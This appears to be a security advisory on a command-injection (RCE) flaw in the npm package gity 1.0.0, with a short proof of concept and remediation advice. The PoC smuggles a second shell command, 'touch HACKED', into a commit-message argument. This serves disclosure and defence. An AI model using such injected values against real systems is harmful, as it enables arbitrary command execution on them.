gity@1.0.0

Vulnerabilities: 1 (via 1 path)

Dependencies: 3

Source: npm

medium severity

Remote Code Execution (RCE)

  • Vulnerable module: gity
  • Introduced through: gity@1.0.0

Detailed paths

  • Introduced through: gity@1.0.0

Overview

gity is a Git wrapper for Node.

Affected versions of this package are vulnerable to Remote Code Execution (RCE), in the form of shell command injection. Arguments passed to gity's chained methods are interpolated into a shell command string and executed without any validation or escaping, so any argument that contains shell metacharacters (for example `;`) causes attacker-supplied commands to run with the privileges of the Node process. The issue is exploitable wherever an argument such as a commit message is derived from untrusted input.

PoC by mik317

  • Create the following PoC file:

    ```js
    // poc.js
    var Git = require('gity');

    // The commit message closes the quoted string, appends a second shell
    // command (touch HACKED), and comments out anything appended after it.
    var git = Git()
      .add('*.js')
      .commit('-m "added js files";touch HACKED;#')
      .run();
    ```

  • Check there aren't files called `HACKED`
  • Execute the following commands in another terminal:

    ```sh
    npm i gity    # Install affected module
    node poc.js   # Run the PoC
    ```

  • Recheck the files: now `HACKED` has been created
## Remediation
There is no fixed version for `gity`. Because every argument is handed to a shell unescaped, no value derived from untrusted input should reach gity's methods; callers who cannot guarantee that should replace the dependency with a wrapper that invokes `git` through an argument vector rather than a command string.
## References
- [HackerOne Report](https://hackerone.com/reports/730111)
- [Vulnerable Code](https://github.com/stevenmiller888/gity/blob/master/lib/index.js#L85)
- [Vulnerable Code](https://hackerone.com/redirect?signature=83666e53042da3c66e97c9afe213f17e5c0d75b0&url=https%3A%2F%2Fgithub.com%2Fstevenmiller888%2Fgity%2Fblob%2Fmaster%2Flib%2Findex.js%23L85)